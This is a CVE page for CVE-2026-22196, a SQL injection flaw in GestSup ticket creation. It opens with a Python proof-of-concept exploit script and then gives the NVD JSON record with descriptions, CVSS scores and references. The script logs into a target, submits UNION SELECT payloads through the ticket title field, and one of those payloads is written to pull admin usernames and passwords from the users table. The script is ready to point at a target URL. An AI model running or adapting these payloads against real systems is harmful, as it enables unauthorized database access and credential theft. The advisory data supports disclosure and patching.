CVE-2026-22196

#!/usr/bin/env python3 """ CVE-2026-22196 PoC - GestSup SQL Injection in Ticket Creation Note: This is for educational and authorized testing purposes only """ import requests import argparse def exploit_sqli(target_url, username, password): """ Exploit SQL injection in GestSup ticket creation functionality """ session = requests.Session() # Step 1: Login to obtain authenticated session login_url = f"{target_url}/index.php?page=login" login_data = { 'username': username, 'password': password } try: login_response = session.post(login_url, data=login_data, timeout=10) # Step 2: Create ticket with SQL injection payload ticket_url = f"{target_url}/index.php?page=ticket/add" # SQL Injection payload for extracting database version sqli_payload = "1' UNION SELECT @@version-- " ticket_data = { 'title': sqli_payload, 'description': 'Test ticket for SQL injection', 'priority': '1', 'category': '1' } ticket_response = session.post(ticket_url, data=ticket_data, timeout=10) print(f"[*] Ticket creation request sent") print(f"[*] Response status: {ticket_response.status_code}") # Step 3: Extract data via error-based or boolean-based injection # Example: Extract admin credentials extract_payload = "1' UNION SELECT CONCAT(username,':',password) FROM users WHERE role='admin' LIMIT 1-- " ticket_data['title'] = extract_payload extract_response = session.post(ticket_url, data=ticket_data, timeout=10) print(f"[*] Data extraction request sent") return True except requests.RequestException as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2026-22196 GestSup SQLi PoC') parser.add_argument('-t', '--target', required=True, help='Target URL') parser.add_argument('-u', '--username', required=True, help='Username') parser.add_argument('-p', '--password', required=True, help='Password') args = parser.parse_args() exploit_sqli(args.target, args.username, args.password)

{"cve": {"id": "CVE-2026-22196", "sourceIdentifier": "[email protected]", "published": "2026-01-09T17:15:55.037", "lastModified": "2026-01-14T19:37:37.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GestSup versions prior to 3.2.60 contain a SQL injection vulnerability in ticket creation functionality. User-controlled input provided during ticket creation is incorporated into SQL queries without sufficient neutralization, allowing an authenticated attacker to manipulate database queries. Successful exploitation can result in unauthorized access to or modification of database contents depending on database privileges."}, {"lang": "es", "value": "Las versiones de GestSup anteriores a la 3.2.60 contienen una vulnerabilidad de inyección SQL en la funcionalidad de creación de tickets. La entrada controlada por el usuario proporcionada durante la creación de tickets se incorpora en las consultas SQL sin la neutralización suficiente, lo que permite a un atacante autenticado manipular las consultas de la base de datos. La explotación exitosa puede resultar en acceso no autorizado o modificación de los contenidos de la base de datos dependiendo de los privilegios de la base de datos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.2.56", "matchCriteriaId": "42882370-536F-4C20-B766-1729C16A0021"}]}]}], "references": [{"url": "https://gestsup.fr/index.php?page=changelog", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/gestsup-sqli-in-ticket-creation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}